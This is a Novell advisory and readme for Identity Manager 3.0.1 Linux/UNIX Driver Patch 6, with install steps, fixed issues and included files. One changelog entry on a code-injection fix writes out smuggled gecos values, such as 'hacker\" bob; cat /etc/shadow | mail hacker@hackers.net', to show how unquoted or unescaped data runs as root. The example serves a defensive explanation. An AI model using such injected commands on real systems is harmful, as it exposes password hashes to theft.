Novell

This is Your Open EnterpriseTM

IDM 3.0.1 Bi-directional Linux-UNIX Driver Patch 6

This document (5006480) is provided subject to the disclaimer at the end of this document.

patches this patch supersedes

FileProductStatusPatch
idm301bidirlinuxunixir3a.tar.gzIdentity Manager 3.0.1ObsoleteIDM 3.0.1 Bi-Directional Linux/Unix Driver Patch 3a

patches that supersede this patch

This patch is not superseded by any other patches.

patch attributes

Security patch: No
Priority: Recommended
Distribution Type: Public
http://download.novell.com/Download?buildid=xNi2is72C34~

document

Revision: 9
Document ID: 5006480
Creation Date: 2007-10-04 10:14:43
Modified Date: 2008-05-13 22:10:11

abstract

Identity Manager 3.0.1 Bi-directional Linux and UNIX Driver Field patch for nxdrv and scripts. This patch is for a patch to the 3.1 version of the Linux and UNIX driver that shipped with Identity Manager 3.0

details

Novell Identity Manager Integration Modules for Linux and UNIX 3.0

Installation Instructions
The install instructions are in two parts. If you have already installed the files from the Patch IDM 3.0.1 Bi-directional Linux-UNIX Driver Patch 4, you only have to do the instructions in part 2

PART 1
1. Stop the driver shim:
/etc/init.d/nxdrvd stop

2. If you have modified any scripts, back them up before uinstalling and re-installing the new driver. These scripts are located at /usr/local/nxdrv/scripts/files (for /etc/passwd)
/usr/local/nxdrv/scripts/nis (for NIS) and /usr/local/nxdrv/scripts/nisplus (for NIS+).

3. If you have already configured the driver for SSL and do not wish to re-configure the driver, backup the following to a temporary SECURE location:
/usr/local/nxdrv/keys/

4. Uninstall the existing driver: nxdrv-uninstall

5. Install the new driver:
sh _driver_install.bin

6. Restore the "keys" directory, if appropriate.

7. Restart the driver shim:
/etc/init.d/nxdrvd start

To install the driver shim (new installation):

1. Run the self-extracting installer:
sh _driver_install.bin

2. Accept the license agreemtn and follow the prompts to
configure the driver shim.

3. Start the driver shim:
/etc/init.d/nxdrvd start

PART 2
1. Stop the driver shim:
/etc/init.d/nxdrvd stop

2. Copy the nxpwdpa from the appropriate OS to your
/usr/local/nxdrv/bin/ directory.

3. Make the binary executable:
chmod +x /usr/local/nxdrv/bin/nxpwdpa

4. Start the driver shim:
/etc/init.d/nxdrvd start

Current issues:

- Fixed the nxpwdpa utility from putting generating invalid password crypts. This can lead to a segmentation fault and the password not synchronized for the user.

Previous issues:

- Fixed a NIS subscriber problem that can sometimes prevent passwords from being updated.

- Fixed a NIS subscriber problem on Solaris 8 where the passwd map does not get updated after password changes.

- Fixed the shadowLastChange attribute not getting updated on successful password updates.

- Fixed the shadowInactive field not being updated on Solaris.

- Fixed segmentation fault that can sometimes occur when the driver connects to the nxdrv (driver shim) for the first time.

- Fixed segmentation fault if the polling interval is set to 0.

- Fixed password synchronization with AIX 5.3 (64-bit mode). This bug manifests itself with an error message in the system log indicating that modify-password.sh reported a segmentation fault.

NOTE: This fix is an IBM-specific issue, which is merely a work-around until the issue is resolved. To activate the fix, you must also edit /usr/local/nxdrv/scripts/globals.sh on
the affected AIX system and insert the lines:
AIX_NO_PWHIST=1; export AIX_NO_PWHIST
into the user-modifiable section of the script.

- Renames do not lower-case the new-name, even when the GCV is configured to lower-case CN's.

- Added GCV option to allow Login Enable commands to be transformed into modify-password commands for systems that do not natively support unlocking user passwords (through the passwd command).
Such systems may include Solaris and HP-UX.

NOTE: For HP-UX, trusted mode, you may, instead, modify enable-user.sh to use the "/usr/lbin/modprpw -k" command to enable users.

- A security exploit could be used by modifying certain Unix fields in such a way that the scripts could execute arbitrary code. This is known as "code injection".
If you have modified the existing scripts, use extreme caution when interpreting data under the shell. Data should always be enclosed in double quotes (") to treat it as a single string parameter to other commands. In addition, the the new idmlib.sh function IDMGETVAR will
escape " and \ inside data values to allow it to be safely enclosed in quotes when evaluated by the shell with the "eval" command. "eval" is used by EXEC when executing commands and returning the output and return codes.

Without enclosing data in quotes, a typical command may be built as follows:
CMD="usermod -c $gecos"
Here, if $gecos contains data such as "hacker bob; cat /etc/shadow | mail hacker@hackers.net", the CMD variable, as interpreted by the shell, with "eval", would read:
usermod -c hacker bob; cat /etc/shadow | mail hacker@hackers.net

These are 2 legitimate commands and will be executed by the nxdrv process, which runs as root. By enclosing these in quotes, we have:
CMD="usermod -c \"$gecos\""

Turns into:
usermod -c "hacker bob; cat /etc/shadow | mail hacker@hackers.net"

Without escaping quotes (") and backslash (\), data can be arranged in such a way as to break the scriptwriter's quotes:

CMD="usermod -c \"$gecos\""

Here, if $gecos contains the value "hacker\" bob; cat /etc/shadow | mail hacker@hackers.net", then CMD will be interpreted, with "eval", as:

usermod -c "hacker" bob; cat /etc/shadow | mail hacker@hackers.net

When IDMGETVAR escapes these quotes, the data will safely be quoted and interpreted:

usermod -c "hacker\" bob; cat /etc/shadow | mail hacker@hackers.net"

- Fixes a problem where an invalid number of fields were create in the shadow map for NIS.

- Fixed a problem where the shadow map was not updated properly.

- Fixed a NIS problem where passwords were not being published.

- Fixed crash that can sometimes occur on shim startup.

- Fixed schema installation failure on eDir 8.8 servers due to an invalid path

- Fixed HP-UX scripts to update /etc/shadow if system is configured for shadow passwords

- Fixed HP-UX scripts to use modprpw in trusted mode systems for enabling/disabling users

- Added check-object-password functionality to check for password synchronization checks in iManager

- Fixed Linux NIS scripts to properly enable/disable users

- Status documents did not contain event-id attributes, preventing operation-data tags from policy from correctly identifying the result of subscriber operations.

file contents

Compressed File Name: idm301bidirlinuxunixir6.tar.gz

Files IncludedSizeDate
idm301bidirlinuxunixir6/Linux/nxpwdpa727.5 KB (745008)2007-10-02 17:25:41
idm301bidirlinuxunixir6/Solaris/nxpwdpa1.3 MB (1378280)2007-10-02 17:25:41
idm301bidirlinuxunixir6/Solarisx86/nxpwdpa1.2 MB (1317016)2007-10-02 17:25:41
readme_5006480.htmlN/A2008-05-13 22:10:12

disclaimer

The Origin of this information may be internal or external to Novell. Novell makes all reasonable efforts to verify this information. However, the information provided in this document is for your information only. Novell makes no explicit or implied claims to the validity of this information. Any trademarks referenced in this document are the property of their respective owners. Consult your product manuals for complete trademark information.

Novell is a registered trademark of Novell, Inc. in the United States and other countries. SUSE is a registered trademark of SUSE Linux AG, a Novell business. *All third-party trademarks are the property of their respective owners.

© 2007 Novell, Inc. All Rights Reserved.